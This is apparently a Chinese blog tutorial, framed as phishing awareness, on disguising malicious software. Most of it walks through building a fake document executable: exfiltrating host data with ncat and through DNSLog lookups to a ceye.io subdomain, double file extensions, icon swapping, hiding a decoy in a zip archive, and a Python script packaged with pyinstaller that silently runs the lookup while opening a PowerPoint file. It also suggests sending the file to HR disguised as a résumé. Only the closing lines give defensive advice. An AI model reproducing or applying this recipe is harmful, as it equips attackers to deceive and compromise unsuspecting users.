防止社工钓鱼——软件伪造,本文首先介绍社工时,是怎么进行软件伪造 欺骗用户的。然后介绍钓鱼软件可能会在哪些场景使用。最后也会总结防止社工钓鱼——软件伪造的注意事项。
下面简单介绍一个伪造的例子。
目的:通过简单的软件伪造,验证是否有防范社工钓鱼的警惕性,确认是否有被钓鱼成功的用户。
首先考虑如何确认是否存在被钓鱼成功的用户,初步想法是将主机部分信息写入到文件,再使用ncat传输文件到服务器上。做法如下:
# 在服务器上启动 持续接收文件的监听,将接收到的数据写到test.txt
ncat -lk 666 >test.txt
# 钓鱼软件中,写入文件,并将文件传输到服务器上
ipconfig | find /i "ipv4"> d:\Readme.txt
ncat x.x.x.x 666 后续考虑到,由于ncat并不是系统自带命令,没法保证文件传输成功,另外可能路径没有权限写入文件等等问题,就放弃了。
于是考虑使用DNSLog平台外带数据,用于确认是否有钓鱼成功的用户。DNSLog平台可以监控DNS解析记录和HTTP访问记录,简单来说DNSLog平台提供了一个abcd.ceye.io的域名,那么可以把信息写在高级域名,本地ping%computername%.abcd.ceye.io,在DnsLog平台上即可看到该条域名解析记录。HTTP访问记录即访问平台提供的http页面时,访问记录也可以查看到。
【社工|如何防止社工钓鱼——软件伪造】
文章图片
做法如下:
1.使用在线的DNSLog(如:CEYE) 或 搭建DNSLog平台(在github上查找开源项目自行搭建)
假定此时获得域名为 abcd.ceye.io,DNS服务器为 1.1.1.1。
公网环境下:钓鱼软件中ping %computername%.abcd.ceye.io 即可
内网环境,且无法访问外网:只能自行搭建DNSLog平台,但由于无法指定被钓鱼主机的DNS服务器,
所以直接ping abcd.ceye.io是无法解析成功的。可以通过nslookup命令指定DNS服务器做域名解析
nslookup %computername%.abcd.ceye.io 1.1.1.1解决了“确认是否有被钓鱼成功的用户”的问题后,接下来开始考虑如何进行软件伪造。
1.伪造文件拓展名
使用超长文件名,隐藏实际的文件拓展名。
如需要伪造为test.pptx,文件名则为test.pptx.exe
文章图片
2.伪造文件图标
使用 Resource Hacker 软件替换原钓鱼软件的图标,或在脚本打包为exe文件时,选择类似的图标。
图标可以通过ps、图标库、网上图片查找。
文章图片
3.运行效果伪造
钓鱼软件如果运行后,如果没有打开被伪造的文件(运行test.pptx.exe后,没有打开test.pptx),
或弹出控制台,则会引起用户的注意。
从两个方面解决,
一:将钓鱼软件和被伪造的文件添加到压缩包里,钓鱼软件中打开被伪造软件,伪造文件设置隐藏,解压
后则只会显示钓鱼软件。同时压缩包也能避免文件传输过程中暴露文件后缀。
二:打包时关闭控制台(不能使用os.system,否则即使关闭控制台,运行时也会闪过控制台)钓鱼脚本:
# -*- coding: utf-8 -*-
import subprocess
import os
from win32com.client import Dispatch# 钓鱼软件实际希望执行的内容
# xxxxsubprocess.Popen("nslookup %computername%.abcd.ceye.io", shell=True)
try:
r_file_path = os.getcwd() + "\\test.pptx"
ppt = Dispatch('PowerPoint.Application')
ppt.Presentations.Open(r_file_path)
except:
pass
# 打包时,选择图标,取消控制台
pyinstaller -F test.py -i pptx.ico -w
文章图片
如果未勾选 显示隐藏的项目,解压后则只显示钓鱼文件,且执行后打开test.pptx文件。
文章图片
钓鱼软件的使用场景:伪造为个人简历,发送给HR;伪造成学习资料、课件,上传到网络上;伪造为其他软件安装包。
如何避免被钓鱼软件社工:
1.收到陌生人发来的压缩包 或 从网络上下载压缩包时,先不要解压,使用压缩软件打开,查看里面的文件内容,这样既可以查看到隐藏文件,也可以查看到实际的文件类型。
2.文件管理器勾选查看隐藏的项目,显示文件后缀,打开文件前注意文件类型。
3.从官方渠道下载安装包。
